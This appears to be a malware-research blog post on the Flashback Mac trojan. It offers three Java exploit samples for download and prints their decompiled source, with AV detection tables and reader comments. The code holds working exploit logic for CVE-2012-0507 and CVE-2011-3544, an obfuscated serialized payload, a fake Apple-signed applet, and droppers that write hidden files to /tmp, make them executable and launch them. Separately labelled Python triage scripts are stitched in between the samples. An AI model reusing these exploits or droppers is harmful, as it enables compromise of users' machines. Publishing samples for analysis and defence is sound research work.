Dr. Web published a BackDoor.Flashback.39 (Flashback.K, 11th variant) epidemic chronology to augment their discovery of the Mac botnet, "Doctor Web exposes 550 000 strong Mac botnet". In general, the Flashback OSX epidemic started on or before August 2011 (F-Secure), with variants distributed as a fake Adobe Flash player. In January 2012, Intego reported Flashback.35/J (the 10th), which was also distributed as a fake Flash download.
I am posting here 3 Java exploits used to distribute Flashback trojans:
SAMPLE 1, JAVA CVE-2012-0507, is dated April 4 and appears to be distributing Flashback.35/J, as seen from the payload.
SAMPLE 2 is a java_signed_applet social engineering exploit (see Michael Schierl's comment below).
SAMPLE 3 is JAVA CVE-2011-3544; both are dated February 2012.
I don't know which domains distributed these exploits (let me know if you do), but perhaps we are seeing the malware distribution scheme common for Windows-targeting exploit packs.
JAVA CVE-2012-0507 with Flashback.35/J payload
MD5: 0bb60cde26e022b8044149f7da138c1f
Size: 25891
JAVA 2011-3544
MD5: d9d193658ea1555124854c3c827e4391
Size: 20989
JAVA 2011-3544
MD5: b134edeacd2660fa08f2f5a2ea916512
Size: 45797
Download
Download all files listed above (email me if you need the password scheme) - with many thanks to anonymous donation
Malware information
SAMPLE 1
JAVA CVE-2012-0507
MD5: 0BB60CDE26E022B8044149F7DA138C1F - Virustotal
First seen by Virustotal 2012-04-02 13:12:35 UTC ( 2 weeks ago )
apl.class Virustotal
{} are replaced by [] to prevent issues with Blogger page saving/posting and AV alerts
// Source File Name: apl.java
package a;

import java.applet.Applet;
import java.io.*;
import java.util.concurrent.atomic.AtomicReferenceArray;

// Referenced classes of package a:
//   Help

public class apl extends Applet
[
    public apl()
    [
        sobj = "8BCA2722525527347C6B4D465146094B4649400968454D4244531CB7E97FB837540E4B2527275F57272727255255272E7C6B46096F424B571CD90BB336AF91C2D82527275F572727272657545527174D4651460952534E4B0944484944525555424953094653484A4E44096653484A4E44754241425542494442665555465E8EF5F9869942472B2527267C2722465555465E5327347C6B4D465146084B4649400868454D4244531C5F575627592724";
    ]

    public void init()
    [
        try
        [
            byte binary[] = loadFileFromResources("/xnm");
            byte arrayOfByte[] = StringToBytes(sobj);
            for(int i = 0; i < arrayOfByte.length; i++)
                arrayOfByte[i] = (byte)(arrayOfByte[i] ^ 0x27);
            ObjectInputStream localObjectInputStream = new ObjectInputStream(new ByteArrayInputStream(arrayOfByte));
            Object arrayOfObject[] = (Object[])(Object[])localObjectInputStream.readObject();
            Help arrayOfHelp[] = (Help[])(Help[])arrayOfObject[0];
            AtomicReferenceArray localAtomicReferenceArray = (AtomicReferenceArray)arrayOfObject[1];
            ClassLoader localClassLoader = getClass().getClassLoader();
            localAtomicReferenceArray.set(0, localClassLoader);
            Help.go(arrayOfHelp[0], binary);
        ]
        catch(Exception ex)
        [
            ex.printStackTrace();
        ]
    ]

    private static byte[] StringToBytes(String s)
    [
        byte data[] = new byte[s.length() / 2];
        for(int i = 0; i < s.length(); i += 2)
            data[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));
        return data;
    ]

    private byte[] loadFileFromResources(String fileName)
        throws IOException
    [
        InputStream fin = getClass().getResourceAsStream(fileName);
        byte readBuf[] = new byte[0x4b000];
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        for(int readCnt = fin.read(readBuf); 0 < readCnt; readCnt = fin.read(readBuf))
            bout.write(readBuf, 0, readCnt);
        fin.close();
        return bout.toByteArray();
    ]

    public static void main(String args[])
    [
        apl v = new apl();
        v.init();
    ]

    private String sobj;
]
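For static triage of applets like apl.class, the following added example (not part of the original post or of the sample) recovers the single-byte XOR key from the Java serialization magic and lists the class descriptors in the decoded stream, without deserializing anything. `SOBJ_PREFIX_HEX` is the first 27 bytes of the `sobj` string above; the second input, the watch list and all function names are constructed for this example.

```python
"""Added triage example: undo a single-byte XOR over a hex string and list
the class descriptors of the Java serialization stream underneath."""
import binascii
import string

STREAM_MAGIC = b"\xac\xed\x00\x05"   # Java serialization magic + version 5
TC_CLASSDESC = 0x72                  # type code that precedes a class name
NAME_CHARS = set(string.ascii_letters + string.digits + "._$[;/")

# First 27 bytes of the sobj hex string shown in apl.java (still XOR-encoded).
SOBJ_PREFIX_HEX = "8BCA2722525527347C6B4D465146094B4649400968454D4244531C"

# Assumption: a watch list chosen for this example. init() casts the second
# deserialized element to this class, so its presence is worth flagging.
WATCHED = {"java.util.concurrent.atomic.AtomicReferenceArray"}


def recover_xor_key(blob):
    """Return the key that turns blob[:4] into the stream magic, else None."""
    if len(blob) < len(STREAM_MAGIC):
        return None
    key = blob[0] ^ STREAM_MAGIC[0]
    if bytes(b ^ key for b in blob[:4]) == STREAM_MAGIC:
        return key          # 0 means the stream was not obfuscated at all
    return None


def class_names(stream):
    """Scan for TC_CLASSDESC + u16 length + name; never instantiates objects."""
    names = []
    i = len(STREAM_MAGIC)
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC:
            n = int.from_bytes(stream[i + 1:i + 3], "big")
            raw = stream[i + 3:i + 3 + n]
            plausible = n >= 2 and len(raw) == n and all(chr(c) in NAME_CHARS for c in raw)
            if plausible:
                names.append(raw.decode("ascii"))
                i += 3 + n   # skip the name so letters inside it are not re-scanned
                continue
        i += 1
    return names


def triage(hex_blob):
    """Decode a hex string, strip the XOR layer and report what it declares."""
    blob = binascii.unhexlify(hex_blob)
    key = recover_xor_key(blob)
    if key is None:
        return {"key": None, "classes": [], "flagged": []}
    stream = bytes(b ^ key for b in blob)
    names = class_names(stream)
    return {"key": key, "classes": names, "flagged": sorted(WATCHED & set(names))}


def constructed_sample(key=0x5A):
    """Constructed input: a header and one class descriptor, XORed with `key`."""
    name = b"java.util.concurrent.atomic.AtomicReferenceArray"
    clear = STREAM_MAGIC + b"\x73\x72" + len(name).to_bytes(2, "big") + name
    return binascii.hexlify(bytes(b ^ key for b in clear)).decode()


if __name__ == "__main__":
    for label, blob in (("sobj prefix", SOBJ_PREFIX_HEX),
                        ("constructed", constructed_sample())):
        print(label, triage(blob))
```

Given the full `sobj` string, the same scan also reports `[La.Help;` and `java.util.concurrent.atomic.AtomicReferenceArray`, matching the two casts in `init()`.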
Help.class Virustotal
// Source File Name: Help.java
package a;

import java.lang.reflect.Constructor;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;

public class Help extends ClassLoader
[
    public Help()
    [
    ]

    public static void go(Help paramHelp, byte param[])
    [
        try
        [
            byte arrayOfByte[] = zn_data;
            URL localURL = new URL("file://");
            Certificate arrayOfCertificate[] = new Certificate[0];
            Permissions localPermissions = new Permissions();
            localPermissions.add(new AllPermission());
            ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(localURL, arrayOfCertificate), localPermissions);
            Class localClass = paramHelp.defineClass("a.Time", arrayOfByte, 0, arrayOfByte.length, localProtectionDomain);
            Constructor x[] = localClass.getConstructors();
            Object objlist[] = new Object[1];
            objlist[0] = param;
            Object znobj = x[1].newInstance(new Object[]
            [
                param
            ]);
        ]
        catch(Exception localException)
        [
            localException.printStackTrace();
        ]
    ]
Flashback.J / BackDoor.Flashback.35 that is being dropped by the applet
File: xnm
MD5: AE7BBF2410B0EFD0CBF1410EA41E07C6
Strings (example taken from x64 binary)
--------------------------------------------------------------------------
__PAGEZERO
__TEXT
__text
__TEXT
__symbol_stub1
__TEXT
__stub_helper
__TEXT
__cstring
__TEXT
__unwind_info
__TEXT
__eh_frame
__TEXT
__DATA
__nl_symbol_ptr
__DATA
__la_symbol_ptr
__DATA
__dyld
__DATA
__const
__DATA
__cfstring
__DATA
__data
__DATA
__common
__DATA
__LINKEDIT
/usr/lib/dyld
/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices
/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
/usr/lib/libz.1.dylib
/usr/lib/libcrypto.0.9.7.dylib
/System/Library/Frameworks/Security.framework/Versions/A/Security
/usr/lib/libgcc_s.1.dylib
/usr/lib/libSystem.B.dylib
/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
AWAVAUATSH
[A\A]A^A_
ATSH
0[A\
ATSH
AWAVAUATSH
8[A\A]A^A_
M{D~
ATSH
P[A\
AWAVAUATSH
w5&h
[A\A]A^A_
t&Hc
<9Ic
AUATSH
wpf9u
[A\A]
ATSH
HOME
User-Agent
/bin/sh
system.privilege.admin
prompt
icon
%s%s
%s "%s%s%s" %s "%s"
%s %s "%s"
sysctl.proc_cputype
dFd1js
IOPlatformUUID
%s|%s|%s|%s|%s|%s|%d
none
x86_64
i386
;//3F
Y/79.O
nunt
://3|UwO.79.uLk
tat_)TD
D://3
.79.
FGtat_
:://3)f
{.79.
9tat_mg
svic.
0TcchiY
/osry2-
rary)
tle U
ch|/B
lopet
plicg
ns/Xe
.app)
tentu
cOS/^
e|/Av
catii
Viruu
rier&
app|)
licar
s/iAh
irus)
tiVit
app|)
licar
s/avg
.appz
plicg
ns/Cj
av.av
Applo
ions)
PScoi
pp|/G
icato
/Pacm
Peepc
lica)
s/Mi>
oft
.app!
plic<
ns/M4
soft}
ice o
H|/Ap-
atio3
=icro.
Off4
P2011!
plic<
ns/S6
.app]
ibra
ache
va/c
Nh_keo;
ibrax
pplii
on S
rt/./
urs/S8
ud/.l9
}allo3
ilib
pathyG
chct
tenv
C+D_IN
H3_LIB
H.ES "
ers/
ed/.
*cOSX
ironBy
tlts
_INS
LIBR
chct;
tenvW
a#6all
i);ri
T/.prhY
/.dl
/.vn&
EDl/.i.
pin/s
SAMPLE 2
java_signed_applet social engineering exploit (see Michael Schierl's comment below)
d9d193658ea1555124854c3c827e4391 Virustotal
First seen by VirusTotal 2012-02-10 09:01:38 UTC ( 2 months ago )
{} are replaced by [] to prevent issues with Blogger page saving/posting and AV alerts
JavaUpdate.class Virustotal
// Source File Name: JavaUpdate.java
package javaupdate;

import java.applet.Applet;
import java.security.AccessController;

// Referenced classes of package javaupdate:
//   Payload

public class JavaUpdate extends Applet
[
    public JavaUpdate()
    [
    ]

    public void init()
    [
        Boolean boolean1 = (Boolean)AccessController.doPrivileged(new Payload());
    ]

    public static void main(String args[])
    [
        AccessController.doPrivileged(new Payload());
    ]
]
Payload.class Virustotal
// Source File Name: Payload.java
package javaupdate;

import java.io.*;
import java.security.PrivilegedAction;
import java.util.zip.DataFormatException;
import java.util.zip.Inflater;

class Payload
    implements PrivilegedAction
[
    Payload()
    [
    ]

    private void saveFile(String s, byte abyte0[])
        throws IOException
    [
        FileOutputStream fileoutputstream = new FileOutputStream(s);
        fileoutputstream.write(abyte0);
        fileoutputstream.close();
    ]

    private byte[] loadFileFromResources(String s)
        throws IOException
    [
        InputStream inputstream = getClass().getResourceAsStream(s);
        byte abyte0[] = new byte[0x4b000];
        ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream();
        for(int i = inputstream.read(abyte0); 0 < i; i = inputstream.read(abyte0))
            bytearrayoutputstream.write(abyte0, 0, i);
        inputstream.close();
        return bytearrayoutputstream.toByteArray();
    ]

    public Object run()
    [
        try
        [
            Inflater inflater = new Inflater();
            inflater.setInput(loader_data);
            ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream(loader_data.length);
            byte abyte0[] = new byte[1024];
            while(!inflater.finished())
                try
                [
                    int i = inflater.inflate(abyte0);
                    bytearrayoutputstream.write(abyte0, 0, i);
                ]
                catch(DataFormatException dataformatexception) { }
            bytearrayoutputstream.close();
            byte abyte1[] = bytearrayoutputstream.toByteArray();
            saveFile(dropFile, abyte1);
            String as[] = {
                "chmod", "777", dropFile
            ];
            Process process = Runtime.getRuntime().exec(as);
            int j = process.waitFor();
            String as1[] = {
                "nohup", dropFile, "&"
            ];
            Process process1 = Runtime.getRuntime().exec(as1);
            int k = process1.waitFor();
        ]
        catch(Exception exception)
        [
            exception.printStackTrace();
            return Boolean.valueOf(false);
        }
        return Boolean.valueOf(true);
    }

    byte loader_data[] = {
];
private static String dropFile = "/tmp/.sysenter";
]
JAR signature files carrying Apple information. DSA and SF files. I think it is something you can fake - "use the JAR Signing and Verification Tool to sign JAR files"
File: SUNMS.SF
Strings
Signature-Version: 1.0
SHA1-Digest-Manifest-Main-Attributes: fPlIJrwM0qYddN2iT3wv1BXlT9s=
Created-By: 1.6.0_17 (Apple Inc.)
SHA1-Digest-Manifest: h1REtbMLPS/h4zSUFRfF4WfRv7g=
Name: javaupdate/JavaUpdate.class
SHA1-Digest: f+I4wjROuXtwlvNBuO9QqMeJIqU=
Name: javaupdate/Payload.class
SHA1-Digest: asgEt/q0WVR8JnKO4gSmSgm+Tao=
File: SUNMS.DSA
Strings
-Cupertino1
Apple Inc.1
Apple Inc.1
Apple Inc.0
120206180202Z
120506180202Z0m1
Cupertino1
Apple Inc.1
Apple Inc.1
Apple Inc.0
Q&iE]@"Q
gQYW
{U%d
staQ_&
0u0m1
Cupertino1
Apple Inc.1
Apple Inc.1
Apple Inc.
=========================================================================
SAMPLE 3 Virustotal
JAVA CVE-2011-3544
MD5: B134EDEACD2660FA08F2F5A2EA916512
First seen by VirusTotal 2012-02-09 09:57:50 UTC ( 2 months, 1 week ago )
rhcls.java Virustotal {} are replaced by [] to prevent issues with blogger page saving posting and AV alerts
// Source
File Name: rhcls.java
import java.applet.Applet;
import java.io.*;
import java.util.zip.DataFormatException;
import java.util.zip.Inflater;
import javax.script.*;
import javax.swing.JList;

public class rhcls extends Applet
[
    public rhcls()
    [
        ldr_data = new byte[11803];
    ]

    // Fills ldr_data byte by byte; the first two values (120, -38 = 0x78 0xDA) are a zlib header
    public void init0()
    [
        ldr_data[0] = 120;
        ldr_data[1] = -38;
        ldr_data[65] = 31;
        ldr_data[66] = 109;
        ldr_data[67] = -79;
        -------------------------------------REDACTED TO SHORTEN--------------------------
        ldr_data[11801] = -122;
        ldr_data[11802] = -89;
    ]

    // The script object's toString() clears the SecurityManager and calls back into the applet
    public void init()
    [
        try
        [
            ScriptEngine engine = (new ScriptEngineManager()).getEngineByName("js");
            Bindings b = engine.createBindings();
            b.put("applet", this);
            Object proxy = engine.eval("this.toString = function() [\tjava.lang.System.setSecurityManager(null);\tapplet.callBack();\treturn String.fromCharCode(97 + Math.round(Math.random() * 25));];e = new Error();e.message = this;e", b);
            JList list = new JList(new Object[]
            [
                proxy
            ]);
            add(list);
        ]
        catch(ScriptException e)
        [
            e.printStackTrace();
        ]
    ]

    // Inflates ldr_data, writes it to dropFile, makes it executable and launches it
    public void callBack()
    [
        try
        [
            init0();
            init1();
            init2();
            init3();
            init4();
            init5();
            init6();
            init7();
            init8();
            init9();
            init10();
            init11();
            Inflater decompressor = new Inflater();
            decompressor.setInput(ldr_data);
            ByteArrayOutputStream bos = new ByteArrayOutputStream(ldr_data.length);
            byte buf[] = new byte[1024];
            while(!decompressor.finished())
                try
                [
                    int count = decompressor.inflate(buf);
                    bos.write(buf, 0, count);
                ]
                catch(DataFormatException e) [ ]
            bos.close();
            byte decompressedData[] = bos.toByteArray();
            saveFile(dropFile, decompressedData);
            String params[] = [
                "chmod", "777", dropFile
            ];
            Process p = Runtime.getRuntime().exec(params);
            int val = p.waitFor();
            String paramstwo[] = [
                "nohup", dropFile, "&"
            ];
            Process p2 = Runtime.getRuntime().exec(paramstwo);
            int valtwo = p2.waitFor();
        ]
        catch(Exception ex)
        [
            ex.printStackTrace();
        ]
    ]

    private void saveFile(String fileName, byte content[])
        throws IOException
    [
        OutputStream os = new FileOutputStream(fileName);
        os.write(content);
        os.close();
    ]

    private byte[] loadFileFromResources(String fileName)
        throws IOException
    [
        InputStream fin = getClass().getResourceAsStream(fileName);
        byte readBuf[] = new byte[0x4b000];
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        for(int readCnt = fin.read(readBuf); 0 < readCnt; readCnt = fin.read(readBuf))
            bout.write(readBuf, 0, readCnt);
        fin.close();
        return bout.toByteArray();
    ]

    private static String dropFile = "/tmp/.sysenterxx";
    byte ldr_data[];
]
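Unpacking the embedded blob for static analysis, as an added example that is not part of the original post or the sample: the first two ldr_data values in the listing (120, -38, which is 0x78 0xDA) form a zlib header, so the array can be rebuilt from the decompiled assignments and inflated offline to hash the dropped file without running the applet. The helper names, FAKE_PAYLOAD and the to_java renderer are assumptions made for the example; the page's listing is redacted, so the code reports the missing bytes instead of inflating it.

```python
import hashlib
import re
import zlib

ASSIGN = re.compile(r"ldr_data\[(\d+)\]\s*=\s*(-?\d+)\s*;")
ALLOC = re.compile(r"ldr_data\s*=\s*new\s+byte\[(\d+)\]")

def recover_blob(java_src):
    """Rebuild ldr_data from decompiled source; return (bytes, missing_count)."""
    size = int(ALLOC.search(java_src).group(1))
    blob, seen = bytearray(size), set()
    for idx, val in ASSIGN.findall(java_src):
        blob[int(idx)] = int(val) & 0xFF      # Java bytes are signed: -38 -> 0xDA
        seen.add(int(idx))
    return bytes(blob), size - len(seen)

def looks_like_zlib(blob):
    """RFC 1950 header: method 8 (deflate) and (CMF*256 + FLG) divisible by 31."""
    return len(blob) >= 2 and (blob[0] & 0x0F) == 8 and ((blob[0] << 8) | blob[1]) % 31 == 0

def unpack(java_src):
    """Inflate the embedded blob without executing it; return triage facts."""
    blob, missing = recover_blob(java_src)
    if missing:
        raise ValueError(f"{missing} bytes not present in listing (redacted?)")
    if not looks_like_zlib(blob):
        raise ValueError("blob does not start with a zlib header")
    payload = zlib.decompress(blob)
    return {"size": len(payload), "magic": payload[:4].hex(),
            "sha256": hashlib.sha256(payload).hexdigest()}

def to_java(blob):
    """Render bytes the way the decompiler listing does (constructed test input)."""
    signed = [b - 256 if b > 127 else b for b in blob]
    body = "\n".join(f"ldr_data[{i}] = {v};" for i, v in enumerate(signed))
    return f"ldr_data = new byte[{len(blob)}];\n{body}\n"

# Constructed stand-in payload, not the sample's real contents.
FAKE_PAYLOAD = b"\xca\xfe\xba\xbe" + b"constructed-payload " * 40
FAKE_SRC = to_java(zlib.compress(FAKE_PAYLOAD, 9))

# The assignments visible in the redacted listing above.
PAGE_EXCERPT = ("ldr_data = new byte[11803]; ldr_data[0] = 120; ldr_data[1] = -38; "
                "ldr_data[65] = 31; ldr_data[66] = 109; ldr_data[67] = -79; "
                "ldr_data[11801] = -122; ldr_data[11802] = -89;")

if __name__ == "__main__":
    print(unpack(FAKE_SRC))
    print(recover_blob(PAGE_EXCERPT)[1], "bytes missing from the page excerpt")
```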
Automated scans
SHA256: e64949f0f505be0b027c2862daecbd4e36702f0cf27f4d9f47d06b8a3d7cd241
SHA1: 42ef0a55690a8e12949e3c6055a322d7cfcb9cd0
MD5: 0bb60cde26e022b8044149f7da138c1f
File size: 25.3 KB ( 25891 bytes )
File name: e64949f0f505be0b027c2862daecbd4e36702f0cf27f4d9f47d06b8a3d7cd241.jar
Detection ratio: 25 / 42
Analysis date: 2012-04-17 02:55:59 UTC ( 1 minute ago )
AntiVir EXP/2008-5353.AK.1 20120416
Antiy-AVL Trojan/Java.Flashfake 20120416
Avast Java:CVE-2012-0507-L [Expl] 20120417
BitDefender Exploit.Java.CVE-2012-0507.N 20120417
ClamAV Trojan.Flashfake-7 20120417
Comodo UnclassifiedMalware 20120417
DrWeb Exploit.CVE2012-0507.3 20120417
Emsisoft Trojan-Dropper.Java.Flashfake!IK 20120417
eSafe Win32.Trojan 20120415
eTrust-Vet Java/CVE-2012-0507!exploit 20120417
F-Secure Exploit.Java.CVE-2012-0507.N 20120417
Fortinet W32/OSX_Flashfake.V!tr.dldr 20120416
GData Exploit.Java.CVE-2012-0507.N 20120417
Ikarus Trojan-Dropper.Java.Flashfake 20120417
Jiangmin TrojanDropper.Java.k 20120416
Kaspersky Trojan-Dropper.Java.Flashfake.b 20120417
McAfee JV/Exploit-Blacole.e 20120416
McAfee-GW-Edition OSX/Flashfake.c 20120416
Microsoft Exploit:Java/CVE-2012-0507.D!ldr 20120416
NOD32 Java/Exploit.CVE-2008-5353.C 20120417
nProtect Exploit.Java.CVE-2012-0507.N 20120417
Sophos Troj/JavaDl-JI 20120417
SUPERAntiSpyware - 20120402
Symantec Trojan.Gen.2 20120417
TrendMicro OSX_FLASHBACK.EV 20120416
TrendMicro-HouseCall OSX_FLASHBACK.EV 20120416
Virustotal
SHA256: 1d24affa137a355a9963d1aba438b66753e62a00ce07d80626f399b600f1f00e
SHA1: 274a483583a965d7e3e3f518115684adf56c7e0a
MD5: ae7bbf2410b0efd0cbf1410ea41e07c6
File size: 55.8 KB ( 57188 bytes )
File name: xnm
File type: OSX binary
Detection ratio: 23 / 42
Analysis date: 2012-04-17 02:47:05 UTC ( 0 minutes ago )
Antiy-AVL Trojan/OSX.Flashfake 20120416
Avast MacOS:Flashback-L [Drp] 20120417
BitDefender MAC.OSX.Trojan.FlashBack.N 20120417
ClamAV OSX.Flashback-9 20120417
Comodo UnclassifiedMalware 20120417
DrWeb BackDoor.Flashback.35 20120417
Emsisoft Trojan-Downloader.OSX.Flashfake!IK 20120417
eSafe Win32.Trojan 20120415
F-Secure MAC.OSX.Trojan.FlashBack.N 20120417
Fortinet W32/OSX_Flashfake.V!tr.dldr 20120416
GData MAC.OSX.Trojan.FlashBack.N 20120417
Ikarus Trojan-Downloader.OSX.Flashfake 20120417
Jiangmin TrojanDownloader.OSX.p 20120416
Kaspersky Trojan-Downloader.OSX.Flashfake.v 20120417
McAfee OSX/Flashfake.c 20120416
McAfee-GW-Edition OSX/Flashfake.c 20120416
Microsoft Backdoor:MacOS_X/Flashback.F 20120416
NOD32 OSX/Flashback.J 20120417
nProtect MAC.OSX.Trojan.FlashBack.N 20120417
Sophos OSX/Flshplyr-B 20120417
Symantec OSX.Flashback.K 20120417
TrendMicro OSX_FLASHBACK.EV 20120416
TrendMicro-HouseCall OSX_FLASHBACK.EV 20120417
Virustotal
SHA256: 8fbf88d0478777e43438dd1edab757760fe145ac53993b2f047494016d163ff0
SHA1: ad716b284fef394bed3a99774bbf27c5da9e248c
MD5: d9d193658ea1555124854c3c827e4391
File size: 20.5 KB ( 20989 bytes )
File name: 8fbf88d0478777e43438dd1edab757760fe145ac53993b2f047494016d163ff0.jar
File type: JAR
Detection ratio: 21 / 42
Analysis date: 2012-04-16 22:54:38 UTC ( 3 hours, 56 minutes ago )
Antiy-AVL Trojan/win32.agent 20120416
Avast Java:Agent-ATC [Expl] 20120416
AVG Java/Exploit.APA 20120417
BitDefender Java.Trojan.Dropper.A 20120417
Comodo UnclassifiedMalware 20120416
DrWeb Java.Dropper.8 20120417
Emsisoft Java.Trojan-Dropper!IK 20120416
eTrust-Vet Java/Flashfake.A 20120416
F-Secure Java.Trojan.Dropper.A 20120417
Fortinet Java/Agent.EB 20120416
GData Java.Trojan.Dropper.A 20120417
Ikarus Java.Trojan-Dropper 20120416
Kaspersky Trojan-Dropper.Java.Flashfake.a 20120416
McAfee OSX/Flashfake 20120416
McAfee-GW-Edition OSX/Flashfake 20120416
NOD32 Java/Agent.EB 20120416
Norman - 20120416
nProtect Java.Trojan.Dropper.A 20120416
Sophos Mal/JavaKC-B 20120416
SUPERAntiSpyware - 20120402
Symantec OSX.Flashback 201204
TrendMicro JAVA_DROPPR.IC 20120416
TrendMicro-HouseCall JAVA_DROPPR.IC 20120416
Virustotal
SHA256: ab925167124a61228d6d8f4c9b04813f5382fc2c916e29ee9bef417c7d2054b5
SHA1: 8071e88e27d9655b8c4f7c30a3e18a0bec3200f1
MD5: b134edeacd2660fa08f2f5a2ea916512
File size: 44.7 KB ( 45797 bytes )
File name: B134EDEACD2660FA08F2F5A2EA916512
Detection ratio: 24 / 42
Analysis date: 2012-04-17 03:04:15 UTC ( 2 minutes ago )
AntiVir EXP/CVE-2011-3544.BC 20120416
Antiy-AVL Exploit/Java.CVE-2011-3544 20120416
Avast Java:CVE-2011-3544-G [Expl] 20120417
AVG Downloader.Generic_c.DCT 20120417
BitDefender Java.Exploit.CVE-2011-3544.A 20120417
ClamAV CVE-2011-3544.Java 20120417
DrWeb Exploit.CVE2011-3544.34 20120417
Emsisoft Exploit.Java.CVE!IK 20120417
eTrust-Vet Java/CVE-2011-3544!exploit 20120417
F-Secure Exploit:Java/Flashback.F 20120417
Fortinet Java/CVE_2011_3544.GX!exploit 20120416
GData Java.Exploit.CVE-2011-3544.A 20120417
Ikarus Exploit.Java.CVE 20120417
Kaspersky Exploit.Java.CVE-2011-3544.gx 20120417
Microsoft Exploit:Java/CVE-2011-3544.BY 20120416
NOD32 Java/Exploit.CVE-2011-3544.N 20120417
nProtect Java.Exploit.CVE-2011-3544.A 20120417
Sophos Mal/20113544-A 20120417
SUPERAntiSpyware - 20120402
Symantec OSX.Flashback 20120417
TrendMicro JAVA_DROPPR.IC 20120416
TrendMicro-HouseCall JAVA_DROPPR.IC 20120417
VBA32 Exploit.Java.CVE-2011-3544.gx 20120416
VIPRE Trojan.Java.Generic (v) 20120416
There was some news that Kaspersky had some software that could fight this Flashfake but simultaneously damages the system, therefore they have not to distribute this tool. Java and Flash Player are heaven for malware, unfortunately.
Apple issued a fix/removal/patch a few days ago so just update your mac.
ReplyDeleteF-secure and dr.Web have tools too.
Number 2 is not any CVE, it is good old java_signed_applet social engineering exploit. Will show a scary message that you are executing code claiming from "Apple Inc." but whose identity cannot be identified, and hopes the user will click "Run" anyway. Will work on any Java version (starting from 1.2 or so), but requires user interaction.
The other two CVE numbers look right. Thanks for showing the decompiled versions in your blog, saves some time!
C:\Temp>jarsigner -verbose -certs -verify D9D193658EA1555124854C3C827E4391
217 Mon Feb 06 12:02:02 CET 2012 META-INF/MANIFEST.MF
338 Mon Feb 06 12:02:02 CET 2012 META-INF/SUNMS.SF
1050 Mon Feb 06 12:02:02 CET 2012 META-INF/SUNMS.DSA
0 Mon Feb 06 12:01:50 CET 2012 META-INF/
sm 525 Mon Feb 06 12:01:50 CET 2012 javaupdate/JavaUpdate.class
X.509, CN=Apple Inc., OU=Apple Inc., O=Apple Inc., L=Cupertino, ST=CA, C=US
[certificate will expire on 06.05.12 20:02]
sm 35864 Mon Feb 06 12:01:50 CET 2012 javaupdate/Payload.class
X.509, CN=Apple Inc., OU=Apple Inc., O=Apple Inc., L=Cupertino, ST=CA, C=US
[certificate will expire on 06.05.12 20:02]
s = signature was verified
m = entry is listed in manifest
k = at least one certificate was found in keystore
i = at least one certificate was found in identity scope
jar verified.
Warning:
This jar contains entries whose signer certificate will expire within six months.
Thank you, I will correct.
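A triage check built on the jarsigner legend quoted in the comment above, as an added example that is not part of the original post or its comments: it flags entries marked s without k, meaning the signature verifies but no signer certificate is in the local keystore, and notes when such a certificate's CN names a well-known vendor. WATCHLIST and the verdict strings are assumptions made for the example.

```python
import re

# Entry line: optional flag column (s, m, k, i), size, timestamp, entry name.
ENTRY = re.compile(r"^\s*(?:([smki]+)\s+)?(\d+)\s+\w{3} \w{3} \d{2} [\d:]{8} \w+ \d{4}\s+(\S+)\s*$")
CERT = re.compile(r"^\s*X\.509,\s*(.+)$")
WATCHLIST = ("apple", "microsoft", "oracle", "adobe")  # hypothetical brand list

def parse(output):
    """Return one dict per JAR entry: name, flag set, list of signer DNs."""
    entries = []
    for line in output.splitlines():
        m, c = ENTRY.match(line), CERT.match(line)
        if m:
            entries.append({"name": m.group(3), "flags": set(m.group(1) or ""), "signers": []})
        elif c and entries:
            # Naive DN split: assumes no RDN value contains ", ".
            parts = (p.split("=", 1) for p in c.group(1).split(", ") if "=" in p)
            entries[-1]["signers"].append(dict(parts))
    return entries

def triage(output):
    """Flag entries whose signature verifies but whose signer is not trusted locally."""
    findings = []
    for e in parse(output):
        if e["name"].startswith("META-INF/"):
            continue
        if "s" not in e["flags"]:
            findings.append((e["name"], "unsigned"))
        elif "k" not in e["flags"]:       # no certificate found in the keystore
            for dn in e["signers"]:
                spoof = any(b in dn.get("CN", "").lower() for b in WATCHLIST)
                findings.append((e["name"], "untrusted-brand-claim" if spoof else "untrusted"))
    return findings

# jarsigner output quoted in the comment above (legend and warning lines omitted).
PAGE_OUTPUT = """\
217 Mon Feb 06 12:02:02 CET 2012 META-INF/MANIFEST.MF
338 Mon Feb 06 12:02:02 CET 2012 META-INF/SUNMS.SF
1050 Mon Feb 06 12:02:02 CET 2012 META-INF/SUNMS.DSA
0 Mon Feb 06 12:01:50 CET 2012 META-INF/
sm 525 Mon Feb 06 12:01:50 CET 2012 javaupdate/JavaUpdate.class
X.509, CN=Apple Inc., OU=Apple Inc., O=Apple Inc., L=Cupertino, ST=CA, C=US
sm 35864 Mon Feb 06 12:01:50 CET 2012 javaupdate/Payload.class
X.509, CN=Apple Inc., OU=Apple Inc., O=Apple Inc., L=Cupertino, ST=CA, C=US
"""

if __name__ == "__main__":
    for name, verdict in triage(PAGE_OUTPUT):
        print(f"{verdict:24} {name}")
```

"jar verified." in this output only says the entries match the signature files; whether the signer is who the certificate claims is a separate question that the k flag answers.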